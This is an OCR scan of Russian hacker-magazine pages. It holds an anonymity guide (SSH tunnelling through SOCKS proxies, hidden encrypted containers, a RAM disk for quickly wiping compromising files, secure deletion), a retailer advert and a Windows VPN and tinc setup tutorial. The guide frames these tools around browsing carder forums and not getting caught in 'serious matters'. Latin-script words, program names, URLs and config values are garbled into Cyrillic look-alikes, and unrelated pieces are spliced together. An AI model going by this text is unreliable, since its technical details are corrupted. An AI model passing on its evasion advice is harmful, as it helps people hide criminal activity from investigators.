за 6 — 7$ долларов в месяц. Идея его использования выглядит 
следующим образом. Сначала с помощью любого 8814-клиента, 
например, ЗесигеСВТ ( ѵѵтѵ.ѵапсіуке.сот ) или РиТТѴ (тѵѵѵ.скіі- 
агк.дгеепепсІ.огд.ик/~зд1аіІіат/риІІу), ты устанавливаешь соеди- 
нение с сервером. Проверяешь, разрешены ли с сервера внеш- 
ние подключения. Если да, то ты совершенно безопасно начина- 
ешь проверять почту, вести разговоры в ІСО/ІВС, серфить карде- 
рские и хакерские форумы. Почему безопасно? А как же иначе, 
если от тебя до 8814-сервера налажен зашифрованный канал, 
который невозможно прослушать и расшифровать? 

Рассмотрим это на конкретном примере. Чтобы не разбираться 
с настройками переадресации портов в 8814-клиентах, предла- 
гаю установить специализированную программу ЕпЩппеІ 
{\/ѵ\/ѵ\/ѵ .ѵапсіуке .сот) . Тулза предназначена исключительно для 
поднятия 8814-туннелей, так что разобраться с ней и со схемой 
в целом будет проще простого. Поскольку помимо шифрования 
нас интересует еще и анонимность, придется воспользоваться 
80СК8-сервером. Идея такова: наладить переадресацию паке- 
тов с локального 1080 порта (порт 80СК8) на удаленный 
80СК8-сервер, причем все это завернуть в 8814-соединение. 
Не понял? Сейчас разберемся подробнее. 

Итак, запускай Епіиппеі и смело жми Сгеаіе а пеѵѵ зеззіоп. В раз- 
деле Соппесйоп обозначаются параметры 88Н-соединения: ІР- 
адрес 88Н-сервера, порт (обычно 22), а также тип авторизации 
(например, с помощью пароля). Заполнив их, приступай к пара- 
метрам непосредственно 88Н-туннеля, которые находятся в раз- 
деле Рогі Рогѵѵагсііпд. Жми Абб (добавить новую переадресацию 
портов), в появившемся окне вводи имя правила (скажем, 
80СК8), а также порт локальной машины, на котором програм- 
ма будет «слушать» запросы (в случае сокса разумно будет ука- 
зать 1080). Далее необходимо включить опцию Оезйпайоп Нозі із 
сШегепІ Ігот ІПе 88Н зегѵег и в текстовом поле ввести адрес заб- 
лаговременно найденного 80СК8-сервера и его порт. На этом 
настройка соединения закончена — можно подключаться. Для 
этого просто нажми Соппесі и наблюдай за полем Зіаіиз. Если 
все прошло успешно, программа с радостью об этом сообщит. 
Все. Теперь Епіиппеі «слушает» подключения на 1080 порту, за- 
ворачивает их в 88Н и в зашифрованном виде передает серверу, 
который, в свою очередь, это добро декодирует и передаст на 
настоящий 80СК8. Что осталось? Осталось заставить приложе- 
ния работать через локальный сокс-сервер, то есть осуществлять 
все подключения через локальный 1080 порт. Если прога поддер- 
живает работу через 80СК8, то проблемы нет вообще. Достаточ- 
но лишь указать в качестве сокса 127.0.0.1:1080. А что делать с 
теми, которые по умолчанию через прокси работать не умеют? 
Здесь как нельзя кстати будут программы-соксофикаторы типа 
ЗоскзСар ( ѵѵтѵ.зоскз.пес.сот ) или РгееСар (ѵѵтѵ.Ігеесар.ги). Я 
рекомендую более универсальное средство Регтео Зесигііу Огіѵег 
( ѵѵтѵ.регтео.сот ), примечательное тем, что способно пускать че- 
рез ЗОСКЗ все и вся, даже без предварительной настройки при- 
ложений (прога работает как сетевой драйвер). 

Все эти тулзы предельно просты в эксплуатации, но если воз- 
никнут вопросы, рекомендую обратиться к статье — ѵѵѵѵѵѵ.ха- 
кер . ги/тадагіпе/ха/063/028/1 .азр. 

Вообще, ЗЗН-туннелирование имеет ряд других неоспоримых 
плюсов. Внешне подобные туннели не вызывают подозрения и 
выглядят как обычная работа на терминале, в то время как 
шифрованный ѴРЫ видно сразу и всем. Более того, все поль- 
зователи ѴРЫ наверняка сталкивались с ситуацией, когда 
ѴРЫ-соединение неожиданно и незаметно обрывалось, а ра- 
бота продолжалась без него, напрямую. Из-за такого вот до- 
садного недоразумения можно легко сдать себя в серьезном 
деле. Делай выводы... 
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6 [шифрование данных] Вся приватная ин- 

формация должна быть тщательным образом за- 
шифрована и спрятана от посторонних лиц с по- 
мощью мощных систем шифрования. Таких, как 
ОгіѵеСгурІ ( ѵѵѵѵѵѵ.сігіѵесгурі.сот ), РОР ѴѴПоІе Эізк Епсгурііоп 
(ил/іл /ѵ.рдр.сот) и ВезЮгурІ ( ѵѵѵѵѵѵ.іеіісо.сот ). Если хочешь мак- 
симум отдачи и минимум геморроя, то смело устанавливай пос- 
леднюю из них — сейчас мы подробно рассмотрим именно ее. 
В ходе установки никаких затруднений возникнуть не должно, и 
мастер очень скоро попросит перезагрузить компьютер. Как толь- 
ко система загрузится заново, ты сразу увидишь в трее новый зна- 
чок. Любоваться там нечем, просто жми на него и в меню выбирай 
пункт ВезЮгурІ Сопігоі РапеІ. Появившееся окно — это панель уп- 
равления программой, с которой нам предстоит немного порабо- 
тать. Здесь нужно в двух словах рассказать о возможностях 
ВезЮгурІ. Используя специальные алгоритмы, прога создает спе- 
циальный файл-контейнер, который можно примонтировать к сис- 
теме как обычный логический диск. Функционально этот диск бу- 
дет точно таким же, как и все остальные, но в тоже время содержа- 
щиеся на нем данные будут шифроваться «на лету» одним из выб- 
ранных крипто-алгоритмов (АЕЗ, ООЗТ 28147-89, ТѵѵоІізІі, 
ВІоѵѵІізП). Фишка заключается в том, что примонтировать такой 
контейнер к системе возможно только после ввода пароля. В про- 
тивном случае, это будет не более чем набор случайных символов, 
связать которые между собой вряд ли под силу даже спецслужбам. 
Приступим к созданию контейнера. Для начала нужно указать диск, 
на котором он будет располагаться, и в контекстном меню выбрать 
пункт Ыеѵѵ сопіаіпег. Появившееся окно будет содержать несколько 
настроек: Рііепате (имя файла-контейнера), І_осайоп (место его 
расположения), Зіге (размер), АІдогШіт (алгоритм шифрования), 
Кеу депегаіог (алгоритм создания ключа). Выбор алгоритмов шиф- 
рования и создания ключа — дело сугубо индивидуальное. Если ты 
мало представляешь суть каждого из них, оставляй параметры по 
умолчанию и жми кнопку Сгеаіе. Далее программа займется созда- 
нием псевдослучайной комбинации символов, необходимой для 
кодирования информации, и ты ей должен в этом деле помочь (не 
будем подробно описывать этот процесс :)). 

Итак, на такой контейнер, безусловно, можно положиться, но 
все-таки это не совсем то. Открыв панель управления програм- 
мы, посторонние легко могут узнать об его существовании, пос- 
ле чего попытаться подобрать или даже выведать у тебя па- 
роль. По этой причине внутри контейнера рекомендуется созда- 
вать так называемую скрытую область, в которую ты можешь 
поместить самую важную информации и при этом быть пол- 
ностью уверенным за ее сохранность. Даже если кто-то узнает 
пароль от твоего зашифрованного диска, он по полной проле- 
тит с содержимым скрытой области. 

Создать скрытую область несложно, но надо учитывать несколь- 
ко моментов. Если ты уже примонтировал зашифрованный раз- 
дел, нужно его отключить (функция Оізтоипі АН ВезЮгурІ 
Огіѵез). Иначе ты просто не сможешь войти в окно свойств 
(СНапде сопіаіпег ргорегііез) контейнера, где и производятся все 
необходимые действия. В этом окне нас интересует только одна 
опция — Сгеаіе Нісісіеп Рагі. Смело активируй ее и жми ОК — по- 
явится новое окно с предупреждением о возможных послед- 
ствиях создания скрытой области. Содержимое длинного текста 
можешь не читать — просто соглашайся. Далее остается лишь 
обозначить объем скрытой области, а также указать пароль, 
после чего можно приступать к ее форматированию. 

Теперь о том, как эта система работает. Если тебе необходимо 
примонтировать обычный зашифрованный контейнер (его имя 
отображается в панели управления ВезЮгурІ), вводи свой пер- 
вый пароль, а если скрытую часть (об ее существовании зна- 
ешь ты и только ты!) — второй. Есть еще один важный нюанс: 
работать с файлами в изначальном контейнере можно исклю- 
чительно до (!) создания скрытой части. Как только ты ее соз- 
дашь, любое копирование/удаление/перемещение данных в из- 
начальном контейнере может привести к потере информации в 
скрытой части. Это происходит потому, что сам ВезЮгурІ не по- 
дозревает о существовании и расположении внутри контейнера 
скрытой части до тех пор, пока пользователь не введет соотве- 
тствующий пароль. Получается, что файлы в изначальном кон- 
тейнере нужны исключительно для маскировки, и ценности 
обычно не представляют. 



7 [ПАМ-диск — средство для 
особых случаев] Для особых 
случаев вместо шифрования дан- 
ных можно использовать экзоти- 
ческий вариант сокрытия данных — ВАМ-диск. 
Существует немало программ как под линукс, так 
и ѴѴіпсІоѵѵз, которые позволяют организовать вир- 
туальный локальный диск, данные которого фи- 
зически будут находиться в оперативной памяти. 
Приоритетной задачей таких программ, со слов 
разработчиков, является многократное увеличе- 
ние скорости чтения/записи. Оно и понятно: лю- 
бая, даже самая медленная оперативка работает 
гораздо быстрее, чем 5031-винт. Впрочем, нас та- 
кая оптимизация интересует мало: гораздо более 
привлекательной кажется другая особенность по- 
добных дисков. Дело в том, что сразу после пере- 
загрузки компьютера все данные из оперативки 
стираются и восстановить их без специального 
оборудования практически невозможно. Да и кто 
узнает об их существовании? По-моему, это мож- 
но вполне успешно использовать! 

Оперативка — это идеальный контейнер для вре- 
менного хранения особо компрометирующих дан- 
ных. Чуть что — быстро в ребут, и от файлов ни- 
чего не осталось. Организовать такой диск сов- 
сем несложно, особенно если под рукой есть 
программа ВАІѴЮізкХР ( ѵѵѵѵѵѵ.сепаіек.сот ). Нужно 
лишь задать размер ВАМ-диска, то есть количе- 
ство выделяемой ему оперативной памяти, и на- 
жать на кнопку Зіагі ВАІѴЮізк. Новый логический 
диск тут же появится в системе. 

Конечно, эта тулза имеет еще несколько настро- 
ек, но для нас они мало интересны. Единственное 
отмечу, что все данные с такого диска могут быть 
мгновенно скопированы в специальный файл об- 
раз (*.ІМО), а при запуске системы — загружены 
на ВАМ-диск. 



5*7 



[безопасное удаление данных] 

8 Не буду в сотый раз объяснять, что 

простого удаления файлов для пол- 
ного их уничтожения недостаточно. 
Их восстановление в этом случае 
не займет много времени. Значительно услож- 
нить задачу и даже свести его шансы к минимуму 
помогут специальные программы. Лучшей в этой 
области является Асгопіз Ргіѵасу Ехрегі. По сути, 
это мощный комплекс утилит, одна из которых 
обеспечивает надежное удаление данных с 
компьютера на основе алгоритмов, удовлетворя- 
ющих самым жестким стандартам, в том числе 
и российскому ГОСТ Р50739-95 © 
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Выбирая компьютер АдеМТ на базе процессора ІпіеГ РепІіит 4 
с технологией НТ Вы оправдаете все ваши ожидания! 

Улучшенная производительность в мультимедийных приложениях. Расширенные возможности 
редактирования цифрового фото и вццео. Непревзойденная скорость обработки музыки. И самое удивительное - ] 

возможность делать всё это одновременно благодаря процессору ІпІеГ РепІіигтГ 4 с технологией НТ! 
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3-х летнее бесплатное обслуживание, включая год полной гарантии 
бесплатное обслуживание на рабочем месте в Москве (в пределах МКАД) 



• 100% предпродажное тестирование 

• отличные характеристики для работы дома и в офисе 



СЕТЬ КОМПЬЮТЕРНЫХ ЦЕНТРОВ РОІ.АК 



, м. Багратионовская, ТВК Торбушкин Двор", пав.: Е2 - 1 4/1 5, Е2 - 1 1 (095)755-551 3 

, м. Братиславская, ул. Братиславская, д.1 6, стр.1 (095)237-8240 

, м. Динамо, ул. 8 Марта, д.1 0, стр.1 (095)262-8039 

, м. Дмитровская, ул. Башиловская, д.29/27 (095)678-5470 

, м. Комсомольская, ун-г «Московский», 4 этаж, пав.: 27 (095)359-891 5 

, м. Красносельская, ул. Краснопрудная, 22/24 (095)389-4622 

, м. Красносельская, ул. Русаковская, д.2/1 (095)784-6385 

, м. Люблино, ТК "Москва", 2 этаж, 1 линия (095)784-661 5 

, м. Пл. Ильича, ул. Сергия Радонежского, 31 (095)935-8727 

, м. Пражская, ТЦ "Электронный рай", пав.: 1 Б-47, 2В-1 4,1 В-1 8, ЗП-9к (095)1 29-1 1 1 9 

, м. Профсоюзная, Нахимовский пр-т, 40 (095)91 6-5627 

, м. Пушкинская, ул. Малая Дмитровка, 1 /7 (095)973-1 1 33 

, м. Савеловская, ВКЦ "Савеловский", ул. Сущевский Вал, д.5, пав.: 20-5,024 (095)730-1 549 

, м. Савеловская, Сущевский вал, 5, стр. 20, ТК "Салют 5", пав.: К-5 (095)200-3060 

, м. Домодедовская, ТЦ "Галерея Водолей", 3 этаж (095)390-8934 

, м. Сокол, Волоколамское ш„ 2, в здании «ГИДРОПРОЕКТ» (095)797-8986 

, м. Шаболовская, ул. Шаболовка, 20 (095)347-9638 

, м. Щукинская, ул. Новощукинская д.7 (095)797-8064 



Санкт-Петербург, м. Новочеркасская, Новочеркасский пр-т, 51 

Санкт-Петербург, м. Пр.Просвещения, ТК "НОРД", 2-й этаж, пав.: 204 

Санкт-Петербург, м. Сенная, ТЦ "ПИК", 3 этаж, пав.:304 

Санкт-Петербург, м. Петроградская, Каменноостровский пр., д.45 

Санкт-Петербург, м. Ладожская, ТК "НЕО", 3 этаж, пав.:52 

Воронеж, ул.Кольцовская, 82 

Воронеж, ул.Кольцовская, 29 

Екатеринбург, пр-т Ленина, 99 

Казань, пр. Ямашева, 82 

Краснодар, ул. Красноармейская, 57 

Нижний Новгород, Пл. М. Горького, ул.Звездинка, 3 

Нижний Новгород, м. Канавинская, ТЦ "Новая Эра", 1 этаж 

Ростов-на-Дону, пр-т Буденновский, 80 

Ростов-на-Дону, пр-т Буденновский, 9/46 

Ростов-на-Дону, Ворошиловский пр-т, д.1 2 

Самара, ул. Стара-Загора, 1 24 

Интернет-магазин: ИіІрУ/зНор.пТ.ги 

Интернет-магазин: Ні:ір://5000.ги 



(095)444-7636 
(812)331-6244 
(812)449-2441 
(812)346-1190 
(812)449-2348 
(0732)72-7391 
(0732)39-0252 
(343)375-3304 
(843)515-45-12 
(861)262-5388 
(8312)78-0357 
(8312)16-9787 
(863)292-4242 
(863)269-8558 
(863)240-5353 
(846)927-1 1 1 1 
(095)970-1939 
(095)363-9363 



ыт 



сотриіег 

Оптовые продажи: 

(095) 970-1930, ѵѵѵѵш.пі.ги 




репііигп /( 



Логотипы N1 Сотриіег и Р0БАР13 являются зарегистрированными знаками их владельцев. Іпіеі, ІпіеІ Бо^о, ІпіеІ Іпзісіе, ІпіеІ Іпзісіе І_оёо, Репііит являются зарегистрированными торговыми знаками корпорации ІпіеІ и ее дочерних компаний в США и других странах 
При покупке компьютера обратите внимание установлена ли лицензионная операционная система МісгозоЛ:®ѴѴіпсІоѵѵ5®ХР. Только в этом случае Р0БАПІ5 может гарантировать надежность работы компьютеров. 



ТОВАР СЕРТИФИЦИРОВАН 




ЮНИТЫ КРЕАТИФФ КОДИНГ ІІЫІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20МЕ РЕПРШМ НЬЮСЫ 



034 

Секретный канал 

ТЫ ИЩЕШЬ ПЛАТФОРМУ, ЧТОБЫ ПОДНЯТЬ 
СОБСТВЕННЫЙ ѴРІМ-СЕРВЕР? И СЧИТАЕШЬ, 

ЧТО ВИНДА — ЭТО НЕ САМЫЙ ПОДХОДЯЩИЙ 
ВАРИАНТ? ОШИБАЕШЬСЯ! СКАЖУ ТЕБЕ ПО 
БОЛЬШОМУ СЕКРЕТУ: С ЭТОЙ ЗАДАЧЕЙ 
ѴѴІЫЭОѴѴЗ СПРАВИТСЯ НЕ ХУЖЕ, ЧЕМ ІЛЧІІХ 
И РВЕЕВЗЭ I ѲгѳК (дгек07@сІеасІтаіІ.ги) 

Поднимаем 
ѴРЫ/ОрепѴРЫ 
под виндой 

[стандартные средства] Использовать 
винду удобнее хотя бы потому, что все необхо- 
димые средства включены в нее по умолча- 
нию. Это значит, что тебе не придется закачи- 
вать из Сети и устанавливать какие-либо до- 
полнительные программы. Для настойки как 
серверной, так и клиенткой части достаточно 
использовать стандартные компоненты систе- 
мы. Весь процесс настройки традиционно осу- 
ществляется с помощью (ЗІІГшных оболочек, и 
это также не может не радовать. У тебя еще 
будет возможность изрядно покопаться в текс- 
товых конфигах ОрепѴРЫ (речь о нем пойдет 
ниже), поэтому ты наверняка оценишь забот- 
ливость разработчиков ѴѴіпбоѵѵз :). 

Возможно, я тебя удивлю, но все вышесказан- 
ное относится не только к серверным вариаци- 
ям винды (ѴѴіпбоѵѵз 2000/2003 Зегѵег). Неверо- 
ятно, но ѴРЫ-сервер можно поднять даже на 
платформе ѴѴіпбоѵѵз ХР РгоІеззіопаІ. Весь про- 
цесс вряд ли займет у тебя больше 2-х минут :). 
Проверь это сам: 

Т] Первым делом переходи в «Панель управле- 
ния -> Сетевые подключения -> Создание ново- 
го подключения». 

\2\ Мастер новых подключений должен быть те- 
бе хорошо знаком. В явном виде о настройке 
ѴРЫ-соединения здесь нигде не упоминается, 
но зато есть пункт «Прямое подключение к дру- 
гому компьютеру». Вот его и выбирай. 

[з] На следующем этапе из двух предложенных 
вариантов выбирай опцию «Принимать входя- 
щие подключения». Это логично, так как мы 
настраиваем сервер. 

Щ Далее мастер предложит указать те устрой- 
ства, с помощью которых планируется прини- 
мать входящие подключения. В списке будут 
представлены установленные в системе моде- 
мы, ВІиеІооІН-адаптеры и подобные девайсы. 
Однако все они нас сейчас мало интересуют, 
поэтому снимай все опции, самовольно уста- 
новленные мастером, и жми «Далее». 

[б] Наконец-то! Мастер догадывается, что нас, возмож- 
но, интересует настройка ѴРІ\І, и поэтому задает соот- 
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и/и/и/. шеборебіа . сот/ТЕЯМ/Ѵ 
/ѴРІ\І.ЫтІ—что такое ѴРН? 
шшш. хакер . г и/т а даііпе/ха/ 
069/068/1 .азр — подробно 
о технологии VРN. 
шшш.гзбп.ги/агіісіе/сгуріо/с 
гуріоарі.хті — хороший 
материал, рассказываю- 
щий о Р8А-алгоритмах. 

Если ты захочешь отком- 
пилировать ііпс или 
0репѴРІ\І самостоятельно, 
тебе потребуются, установ- 
ленные на компьютере, 

Суд мп ( и/и/и/, суд ѵѵіп . сот ) 
или МіпіѲУ/ (шшш.тіпі.огд). 
Однако я все же рекомен- 
дую использовать готовые 
бинарники. 




ветствующий вопрос. Смело отвечай «Разрешить виртуальные частные сети». 

[ё] Следующий шаг — параметры авторизации пользователей. Само со- 
бой разумеется, что подключиться к ѴРІ\І-серверу может не каждый. Для 
установки соединения клиент в обязательном порядке должен пройти 
процедуру авторизации. Собственно, сейчас мастер предлагает выб- 
рать тех пользователей, которым разрешен вход в виртуальную частную 
сеть. Можно выбрать некоторых локальных юзеров или же добавить но- 
вых. В последнем случае нажми на кнопку «Добавить» — мастер сразу 
потребует ввести имя нового пользователя и пароль. 

Щ Настройка сетевых протоколов и в особенности ТСР/ІР не менее важна. 
Выбери соответствующий пункт в списке протоколов и нажми на кнопку 
«Свойства». Для того чтобы пользователь мог получить доступ к твоей сети, 
необходимо активировать опцию «Разрешить звонящим доступ к локальной 
сети». Далее требуется обозначить диапазон ІР-адресов, которые смогут ис- 
пользовать подключившиеся клиенты. Возможен также вариант, когда юзе- 
ру ІР-адрес будет выдаваться автоматически посредством службы ЭНСР. 
[В Все, настройка на этом завершена. Можешь попросить кого-нибудь 
из друзей подключиться к твоему новоиспеченному серверу. Настройка 
клиентского подключения мало чем отличается от создания ЭіаІ-ир сое- 
динения, поэтому мы ее рассматривать не будем. Слишком просто. 

[а как же ѵѵіпсіоѵѵз зегѵег?] Настройку ѴРЫ в ѴѴіпбоѵѵз ХР урезали по 
самое не балуй. С одной стороны, это хорошо и позволяет разобраться в 
установке даже новичкам, но что же делать нам, гуру? :) Ответ на этот 
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вопрос так же прост, как и очевиден: вместо пресловутой ХР, которая ед- 
ва ли подходит для подобных экспериментов, использовать мощную сис- 
тему в лице ѴѴіпсІоѵѵз 2003 Зегѵег. Настроить серверную ось несколько 
сложнее, но этот подробный мануал избавит тебя от лишних вопросов: 

.131 Для начала через меню «Пуск» открой окно «Администрирование» и 
далее «Маршрутизация и удаленный доступ». 

\ 2 \ В консоли управления выбери локальный сервер и внимательно 
смотри на нижнюю левую часть окна. Если увидишь красный индикатор, 
значит, необходимая нам служба не подключена. Хорошо бы это испра- 
вить: для этого нажми правой кнопкой по имени сервера и выбери в ме- 
ню «Настроить и включить маршрутизацию и удаленный доступ». 

[з] Далее щелкни по иконке «Удаленный доступ (ѴРЫ или модем)», и 
специальный мастер спросит тебя, какие подключения можно прини- 
мать. Нас сейчас интересует исключительно ѴРЫ — его и отмечаем. 

Щ Появившееся окно «ѴРЫ-подкпючение» предлагает обозначить некоторые 
параметры будущих подключений. Выбери то подключение, которое относит- 
ся к твоей локальной сети или же Интернету (в зависимости от планируемой 
структуры и назначения ѴРЫ-соединения), а затем нажми кнопку «Далее». 

Ц] В окне «Назначение ІР-адреса» мастер предлагает задать настройки ІР- 
адресов, которые будут присваиваться клиентам при подключении. Если на 
машине установлен ОНСР-сервер (что довольно вероятно), выбери пункт 
«Автоматически» и жми «Далее». Если хочешь задать диапазон выдаваемых 
ІР-адресов вручную, введи интересующие тебя значения в поля «Начальный 
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ІР-адрес» и «Конечный 
ІР-адрес». Проследи, 
чтобы эти ІР-адреса бы- 
ли из той же подсети, 
что и твой компьютер. В 
противном случае при- 
дется прописывать до- 
полнительные правила 
маршрутизации, чтобы 
все клиенты были дос- 
тигаемы. 

[ё] На следующем 
этапе рекомендую тебе 
принять параметр по 
умолчанию «Нет, ис- 
пользовать маршрути- 
зацию и удаленный 



НЕДОСТАТКИ РЕАЛИЗАЦИИ 
ѴРИ В ѴѴІШОѴѴЗ 

При всей простоте настроек, реали- 
зация ѴРІ\] в ѴѴіпсІоѵѵз имеет некото- 
рые недостатки. Сейчас ты поймешь, 
что я имею в виду — для этого обра- 
тимся к внутренностям ѴРІ\І-соедине- 
ния. После того как пользователь 
инициировал ѴРІЧ-подключение, 
между ним и сервером организуется 
специальный туннель, по которому 
начинает осуществляться передача 
данных: техническая информация, 
касающаяся процесса идентифика- 
ции, а также инкапсулированный ІР, 
ІРХ, ІМеІВЕІІІ-трафик в зашифрован- 
ном виде. Инкапсуляция трафика 
осуществляется с помощью ОВЕ- 
протокола (Оепегіс ВоіЛіпд 
Епсарзиіайоп), который, по сути, и яв- 
ляется слабым узлом системы. Проб- 
лема заключается в том, что некото- 
рые провайдеры не пропускают ОВЕ- 
пакеты и тем самым полностью бло- 
кируют использование ѴРЫ. Обойти 
это ограничение невозможно, поэто- 
му приходится обращаться к альтер- 
нативным реализациям ѴРЫ, исполь- 
зующим свою собственную систему 
инкапсуляции трафика. 



доступ для проверки 
подлинности запросов на подключение». В последний раз жми кнопку «Да- 
лее», затем «Готово» — на этом предварительная подготовка завершена. 

По большому счету, ѴРЫ-сервер готов к работе, однако подключения к 
нему пока еще запрещены. Разрешить удаленные подключения помо- 
жет опять же системный апплет «Маршрутизация и удаленный доступ»: 



[ХАКЕР 11 [83] 05 > РС_20ЫЕ 035 ] 





[хакер 11 [83] 05 > РС_20ЫЕ 036 ] 





в качестве авторизированных ■ самого главного: разрешаем 
юзеров можно выбрать некоторых щ виртуальные частные сети 



локальных пользователей. А мож- 



но прописать в систему новых, на- 
жав на кнопку «Добавить» 



Щ Дважды кликни по объекту сер- 
вера и выбери «Политики удален- 
ного доступа». 

\ 2 \ Теперь найди значок «Подключения к серверу маршрутизации и 
удаленного доступа», щелкни по нему правой кнопкой мыши и перей- 
ди в меню «Свойства». 

[з] Мы добрались до интересующей нас опции — «Предоставить разрешение 
на удаленный доступ». Активируй ее и нажми «ОК». Настройка завершена. 
Теперь ѴРЫ-сервер может принимать входящие подключения, но пока 
непонятно, какие и от кого. Осталось самая малость — указать системе 
авторизированных для подключения пользователей, что осуществляет- 
ся через службу каталогов (Асііѵе Оігесіогу). Если она не установлена 
или не настроена, могу только посочувствовать и посоветовать прочи- 
тать статью «Оседлай ѴѴіпбоѵѵз 2003» в #77 номере X. Если же с АО все 
ОК, то порядок действий будет следующим: 



Ш Перейди «Пуск -► Администрирование -► Асііѵе Оігесіогу — пользова- 
тели и компьютеры» 

\2\ Теперь создай новую или найди интересующую тебя учетную запись 
и открой ее свойства. 

[з] В закладке «Входящие соединения» есть пункт «Разрешить доступ». 
Его и нужно активировать. 

В системе есть еще немало настроек, относящихся к ѴРЫ-соединениям. 
Все они нужны для того, чтобы администратор мог до мельчайших дета- 
лей отконфигурировать виртуальную частную сеть и сделать ее такой, 
какой бы хотел ее видеть. Дерзай! 



внутри ѴРЫ-сети всегда пойдут по самому оптимальному пути и, ес- 
ли это возможно, напрямую в точку назначения. Думаю, даже этого 
достаточно, чтобы тебя заинтриговать, поэтому предлагаю перейти 
к практической части. 

[настраиваем демон ііпс] Установить Ііпс под І_іпих несложно. На- 
ладить его работу под ѴѴіпбоѵѵз — еще проще. Если говорить о ѴѴіпбоѵѵз- 
системах, то все необходимые приготовления сводятся к установке 
драйвера для виртуального сетевого устройства. Тіпс использует драй- 
вер ТАР-ѴѴіп32, который по умолчанию включен в дистрибутив програм- 
мы, но при необходимости может быть закачен с сайта ОрепѴРЫ 
(тѵі л/.орепѵрп.пеі). После завершения установки программы перейди в 
папку С:\Ргодгат РіІез\гіпс\іар-ѵѵіп32. Здесь находится файл абсІіар.Ьаі. 
Запусти его и в меню «Пуск -> Сетевые подключения» появится новое 
сетевое подключение, которое я предлагаю сразу обозвать ѴРЫ. К его 
настройкам мы вернемся чуть позже. 

Демон имеет всего один исполняемый файл — ііпсб.ехе. Кому-то это мо- 
жет показаться странным: ведь должна быть как серверная, так и кли- 
ентская часть. Объясняется это очень просто: поведение Ііпс'а пол- 
ностью зависит от тех настроек, которые указаны в его конфигурацион- 
ных файлах. После запуска демон Ііпс считывает командную строку и 
конфигурационный файл ііпс.сопі. Если в конфиге есть хотя бы один па- 
раметр СоппесГГо, программа автоматически начинает выполнять 
функции клиента и пытается подключиться к узлам, указанным с по- 
мощью этого параметра. В то же время независимо от того, был ли ука- 
зан параметр СоппесГГо или нет, Ііпс продолжает отслеживать входя- 
щие подключения от других демонов. Получается, что разницы между 
клиентом и сервером в ііпс'е нет. Однако одна из сторон обязательно 
должна быть клиентом, чтобы инициировать подключение. 

Чтобы не грузить тебя нудной теорией, предлагаю на деле показать воз- 
можности тулзы, подняв ѴРЫ-соединение между двумя подсетями. Пара- 
метры первой подсети: 192.168.0.1/24, маска подсети — 255.255.255.0. 
Параметры второй: 192.168.0.2/24, маска подсети — 255.255.255.0. Де- 
мон ііпс нужно установить на каждой из них и лишь после этого присту- 
пать к конфигурированию. 

В самом простом случае файл конфигурации ііпс.сопі выглядит следую- 
щим образом: 



[что есть ііпс?] Список ОіГіег ѴРЫ зоіиііопз (і/уму .ііпс-ѵрп .огд/ѵрпііпкз) 
насчитывает порядка 15 подобных реализаций. Особое уважение и на- 
ибольшую популярность завоевали две из них: ііпс (тѵі л/. Ііпс-ѵрп. огд) и 
ОрепѴРЫ ( ѵѵѵѵѵѵ.орепѵрп.пеі ). Их-то мы сегодня и рассмотрим. 

Когда смотришь на смехотворных размер дистрибутива ііпс (всего 
697 Кб) даже представить себе не можешь, что разработчики умуд- 
рились уместить в нем полноценное средство для организации ѴРЫ- 
соединений. Приложение поддерживает все необходимые атрибуты, 

присущие виртуальным частным 
сетям, и даже больше! Суди сам: 
туннелирование трафика, непре- 
рывное шифрование передавае- 
мых данных и даже компрессию 
«на лету». Примечательно, что 
возможности ііпс не ограничива- 
ются подключениями точка-точ- 
ка. Виртуальная сеть может быть 
составлена из нескольких клиен- 
тов и, что особенно приятно, ііпс 
самостоятельно будет решать 
все задачи, касающиеся марш- 
рутизации. Будь уверен: данные 




генерация ключей прошла успешно 




Мате = оТТісе 
Іпіегіасе = ѴРМ 
СоппесГГо = Йоте 

Параметр Ыате обозначает имя узла в ѴРЫ-подключении. Оно совер- 
шенно не обязательно должно совпадать с именем компьютера или 
чем-либо еще, но должно быть уникальным. Так, если первый компью- 
тер имеет имя оііісе, то второй уместно будет назвать Гюте. С помощью 
второго параметра — Іпіегіасе — выбирается соединение, которое бу- 
дет использоваться для поднятия ѴРЫ-канала. Проще говоря, нужно 
указать имя соединения, использующее виртуальное сетевое устрой- 
ство (ТАР-ѴѴіп32). Если ты последовал моему совету и переименовал 
его в ѴРЫ, то параметр должен иметь значение, как у меня в примере. 
О параметре СоппесГГо я уже говорил: он указывает имя ѴРЫ-узла, к ко- 
торому будет осуществляться подключение. Несложно догадаться, как 
будет выглядеть конфиг на другом ѴРЫ-узле: 

Мате = Йоте 
Іпіегіасе = ѴРМ 
СоппесГГо = оііісе 

В данном случае оба узла инициируют взаимное подключение — это не 
возбраняется. Вернемся к параметру пате: его значения Гюте и оііісе 
представляют собой символические имена, которые декларируют назва- 
ния ѴРЫ-клиентов, но сами по себе ничего не значат. Для конкретного 
описания узлов используется второй тип конфигурационных файлов, 
располагающихся в директории С:\Ргодгат РіІез\Ііпс\ІюзІз. Например, 
конфиг, который описывает ѴРЫ-узел Гюте, лежит здесь — С:\Ргодгат 
РіІез\Ііпс\ІюзІз\Ііоте. Параметры оііісе'а обозначены в файле \ЬозІз\оііісе 
и т.д. По умолчанию таких файлов не существует, поэтому их нужно за- 
дать самостоятельно. Если верить документации, то с их помощью мож- 
но прописать довольно много параметров ѴРЫ-узла, однако в нашем 
случае будет достаточно одного из них — зиЬпеі. 

Файл Ноте: 

ЗиЬпеі = 192.168.0.1/24 
Файл оііісе: 

ЗиЬпеі = 192.168.1.1/24 
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Всѳ остальные параметры в случае ѴѴіпсІоѵѵз неактуальны, поскольку за- 
даются с помощью виртуального сетевого соединения, которым мы сей- 
час и займемся. Открой «Сетевые подключения» и сразу переходи в 
свойства ТСР/ІР виртуального адаптера. Самое важно здесь — устано- 
вить на каждом компьютере маску подсети — 255.255.0.0. Выбор ІР-ад- 
ресов не столь критичен, просто выбери их из соответствующих подсе- 
тей (для Йоте — 192.168.0.*, для оііісе — 192.168.1.*). 

Казалось бы, все — можно запускать Ііпс на всех машинах и начинать 
работать. А вот и нет! Для полноценной работы ѴРЫ и шифрования тра- 
фика необходимо наличие двух ключей: открытого и закрытого. Сгене- 
рировать такие ключи можно командой: 

ІІПССІ -К 



ТіпссІ создаст 2 1024-битных ключа и спросит, куда их следует сохра- 
нить. Программой также будут предложены пути по умолчанию, и с ни- 
ми вполне можно согласиться. Для этого достаточно дважды нажать на 
клавишу <ЕпІег>. В результате имеем два файла гза_кеу.риЬ, 
